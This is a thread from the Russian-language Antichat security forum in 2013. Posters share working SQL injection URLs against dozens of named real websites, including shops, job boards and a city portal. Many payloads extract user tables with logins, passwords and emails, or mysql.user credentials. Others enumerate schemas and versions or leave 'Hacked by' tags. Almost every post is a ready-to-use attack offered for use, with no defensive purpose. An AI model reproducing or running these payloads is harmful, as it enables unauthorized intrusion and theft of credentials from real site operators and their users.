HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15651  
Старый 06.09.2013, 00:35
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

ПриватБанк Авто

Код:
Code:
http://privat-auto.info/index.php?region=-1+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
См. исходный код 7 строку.

Pyramid CAr

Код:
Code:
http://www.pyravastuconsultant.in/pyramid-car.php?id=1+union+select+1,2,3,4,5,6,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28pyravast_pyravast.user_m%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,password%29%29%29%29x%29+--+
Авто в аренду

Код:
Code:
http://www.elitetrans.com.ua/car.php?show=category&id=-6+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Греко-католики

Код:
Code:
http://www.mgce.uz.ua/category.php?id=14+union+/*!select*/+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3+--+
Ювелирсервис

Код:
Code:
http://www.js.dn.ua/item.php?id=6&ref_item=133%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27/
5.1.61

=========================================

ELKOPLAST

Код:
Code:
http://elkoplast.ua/pro.php?id=30%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
Версия:5.5.31

БукВица

Код:
Code:
http://www.bookvica.com.ua/shop.php?id=300+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28bookvica_bookvica.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12,13+--+
 
Ответить с цитированием

  #15652  
Старый 06.09.2013, 09:38
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от None  
http://
www.planetfengshui.in
/love.php?id=9&cat_id=9+and+1=2+union+select+1,conc at(unhex(hex(user())),0x3a,unhex(hex(database())), 0x3a,unhex(hex(version()))),3,4,5,6 --+
===========================================

Цитата:
Сообщение от None  
http://
www.accu-split.com
/event-details.html?id=-31'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13 --+
===========================================
 
Ответить с цитированием

  #15653  
Старый 06.09.2013, 21:11
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Comedy Club Kuban STYLE - как я их ненавижу, если честно!

Код:
Code:
http://comedykuban.ru/news.php?news_id=-17%27+union+select+1,0x472e4d61727469726f7379616e202d20332c313464617220436f204c74642e,3,4+--+
Версия: 5.5.30-30.2-log

=============================================

Интернет-магазин ТехноСектор

Код:
Code:
http://www.tes-ua.com/catalog.php?cat_id=29&brend=-180%29+union+select+1,2,3,4,5,6,7,8,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
 
Ответить с цитированием

  #15654  
Старый 06.09.2013, 22:22
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.mtosmt.org/mto-announce.php?id=-120+union+select+1,concat_ws(0x3a,version(),user(),database()),3,0x4861636b6564206279205365706f,5--
Код:
Code:
http://www.nau.in/announce.php?id=-595+union+select+1,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--
 
Ответить с цитированием

  #15655  
Старый 08.09.2013, 01:38
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.bjp-bg.com/paper.php?id=-5%20union%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
 
Ответить с цитированием

  #15656  
Старый 08.09.2013, 11:22
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Фотограф Andre Arment

Код:
Code:
http://www.andrearment.com/cat.php?id=-3'+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(andrearm_db.members)where(0x00)in(@x:=concat(@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5+--+
NOTE: См. исходный код 67 строка.

===============================================

Салон Аудио-Видео Триумфальная Арка

Код:
Code:
http://www.arka-hitech.com.ua/cat.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
4.1.25-log

===============================================

Официальный сайт Харькова

Код:
Code:
http://www.kharkov.ua/internet.php3?categ=-25+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28khadm.clients%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,email,0x3a,clientusername,0x3a,clientpassword%29%29%29%29x%29,4,5,6,7,8+--+
BrilliantStudents.com

Код:
Code:
www.brilliantstudent.in/games.php?id=-2+union+/*!select*/+1,2,/*!table_name*/,4,5,6,7+/*!from*/+/*!information_schema.tables*/+/*!limit*/+4,20+--+
Note:Не смог вывести данные из таблицы bs-admin

Dracodes - GAMES или фильтр "грубой очистки".

Код:
Code:
http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28Sql286973_1.jos_users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29+--+
Marim.IT

Код:
Code:
http://www.marim.it/games.php?id=494%20and%20%281,1%29%3E%28select%20count%28*%29,concat%28%28select%20version%28%29%20%29,0x3a,floor%28rand%28%29*2%29%29%20x%20from%20%28select%201%20union%20select%202%29%20a%20group%20by%20x%20limit%201%29%23
Версия: 5.0.51a-24+lenny4:0

AutoDiv

Код:
Code:
http://autodiv.rs/auto.php?id=1187%27+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+
Версия:5.1.53

JobMan.Ru

Код:
Code:
http://www.jobman.ru/html/doc.php?id=30+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+
Novikovi.info

Код:
Code:
http://novikovi.info/man.php?id=-73+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2,3,4,5+--+
ЛАСМЕТ - Лаборатория специальной металлургии!

Код:
Code:
http://www.lasmet.ru/steel/mark.php?s=-50+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28lasmet18_db2.admin%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,passwd%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
:: fmaurer ::


Код:
Code:
http://www.fmaurer.com/index.php?category_id=-5+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
Версия: 5.0.51a-24+lenny5

Маршрутизаторы Axesstel

Код:
Code:
http://www.axesstel.com/index.php?section=product&subsection=product_category&category_id=15+aND+1=0+UNION+SELECT+1,2,VERSION%28%29,4,5,6,7,8,9,10+--+
Версия: 4.1.22-standard-log

ЭКОМ - Общественное обсуждение градостроительных объектов

Код:
Code:
http://ecom.su/city_building/index.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
P.S Не забываем убирать пробелы!
 
Ответить с цитированием

  #15657  
Старый 11.09.2013, 00:17
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.sostrader.it/sostrader/didattica1.cfm?id=2+and+1=0+union+all+select+1,2,@@version/*
 
Ответить с цитированием

  #15658  
Старый 13.09.2013, 14:35
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

UP

Цитата:
Сообщение от None  
http://
www.remassociates.co.uk
/jobs.php?id=34'+union+select+1,@@version,3,4,5,6,7 ,8,9,10,11,12,13+--+
===============================================

pr=1

Цитата:
Сообщение от None  
http://
www.torson.be
/jobs.php?id=8+and +1=2+union+select+1,2,version(),4+--+
===============================================

pr=3

Цитата:
Сообщение от None  
http://
careers.cngroup.co.uk
/job.php?id=6'+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
===============================================

pr=3

Цитата:
Сообщение от None  
http://
www.navagaprom.com
/oldsite/job.php?id=-96+union+select+1,version(),3,4+--+&db=job
===============================================

Цитата:
Сообщение от None  
http://
www.cornerjob.co.za
/view-job.php?id=678 and if(mid(version(),1,1)=5,sleep(5),0)
===============================================

pr=6

Цитата:
Сообщение от None  
http://
www.niot.res.in
/recruit/cv/job.php?id=-106+union+select+concat_ws(0x3a,user,password,file _priv),2,3 from mysql.user+--+
===============================================

pr=3

Цитата:
Сообщение от None  
http://
www.tedrecruitment.com
/job.php?id=8263'+and+row(1,1)>(select+count(*),con cat((select +table_name from information_schema.tables where table_schema=database() limit 11,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x ) and '1'='1
===============================================
 
Ответить с цитированием

  #15659  
Старый 13.09.2013, 16:36
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

тиц = 300

Цитата:
Сообщение от None  
http://
www.artantique.ru/brand-item.phtml?id=15+union+select+1,concat_ws(':',user (),version(),database()),3,4,5,6+--+
File_priv = Y
 
Ответить с цитированием

  #15660  
Старый 14.09.2013, 13:14
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.toddjobs.com/job.php?ID=-97+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),7,8,9,10,11,12,13,14--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ